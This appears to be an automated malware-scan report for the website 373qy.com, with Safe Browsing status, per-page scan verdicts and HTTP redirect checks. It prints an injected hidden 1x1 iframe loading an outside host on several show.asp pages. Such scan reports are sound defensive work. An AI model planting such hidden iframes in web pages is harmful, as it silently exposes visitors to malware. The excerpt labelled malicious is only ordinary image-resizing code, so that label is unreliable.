Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=373qy.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://373qy.com/ | 200 OK Content-Length: 23882 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var flag=false; function newDrawImage(ImgD){ var image=new Image(); var iwidth = 174; var iheight = 175; image.src=ImgD.src; if(image.width>0 && image.height>0){ flag=true; if(image.width/image.height>= iwidth/iheight){ if(image.width>iwidth){ ImgD.width=iwidth; ImgD.height=(image.height*iwidth)/image.width; }else{ ImgD.width=image.width; ImgD.height=image.height; } } else{ if(image.height>iheight){ ImgD.height=iheight; ImgD.width=(image.width*iheight)/image.height; }else{ ImgD.width=image.width; ImgD.height=image.height; } } } } Antivirus reports:
| ||
http://373qy.com/js/jquery.js | 200 OK Content-Length: 31033 Content-Type: application/x-javascript | clean |
http://373qy.com/js/niutuku.js | 200 OK Content-Length: 7058 Content-Type: application/x-javascript | clean |
http://373qy.com/js/slideshow.js | 200 OK Content-Length: 230331 Content-Type: application/x-javascript | clean |
http://373qy.com/tdxx.asp | 200 OK Content-Length: 16901 Content-Type: text/html | clean |
http://373qy.com/index.asp | 200 OK Content-Length: 23882 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var flag=false; function newDrawImage(ImgD){ var image=new Image(); var iwidth = 174; var iheight = 175; image.src=ImgD.src; if(image.width>0 && image.height>0){ flag=true; if(image.width/image.height>= iwidth/iheight){ if(image.width>iwidth){ ImgD.width=iwidth; ImgD.height=(image.height*iwidth)/image.width; }else{ ImgD.width=image.width; ImgD.height=image.height; } } else{ if(image.height>iheight){ ImgD.height=iheight; ImgD.width=(image.width*iheight)/image.height; }else{ ImgD.width=image.width; ImgD.height=image.height; } } } } Antivirus reports:
| ||
http://373qy.com/show.asp?m=1 | 200 OK Content-Length: 19407 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://373qy.com/show.asp?m=2 | 200 OK Content-Length: 8192 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://373qy.com/js/ToolTip.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://373qy.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://373qy.com/show.asp?m=3 | 200 OK Content-Length: 8642 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://373qy.com/show.asp?m=4 | 200 OK Content-Length: 13085 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://373qy.com/show.asp?m=5 | 200 OK Content-Length: 7005 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://373qy.com/show.asp?m=6 | 200 OK Content-Length: 11205 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://373qy.com/show.asp?m=7 | 200 OK Content-Length: 13220 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 373qy.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cathe
Date: Fri, 15 Aug 2014 09:44:06 GMT
Pragma: No-Cathe
Server: Microsoft-IIS/6.0
Content-Length: 23882
Content-Type: text/html
Expires: Thu, 14 Aug 2014 09:44:06 GMT
Set-Cookie: ASPSESSIONIDSSDRQATC=MHDLALOCPCGAGKEMMBBMDKMI; path=/
X-Powered-By: ASP.NET
...23882 bytes of data.
GET / HTTP/1.1
Host: 373qy.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cathe
Date: Fri, 15 Aug 2014 09:44:06 GMT
Pragma: No-Cathe
Server: Microsoft-IIS/6.0
Content-Length: 23882
Content-Type: text/html
Expires: Thu, 14 Aug 2014 09:44:06 GMT
Set-Cookie: ASPSESSIONIDSSDRQATC=MHDLALOCPCGAGKEMMBBMDKMI; path=/
X-Powered-By: ASP.NET
...23882 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 373qy.com
Referer: http://www.google.com/search?q=373qy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 373qy.com
Referer: http://www.google.com/search?q=373qy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.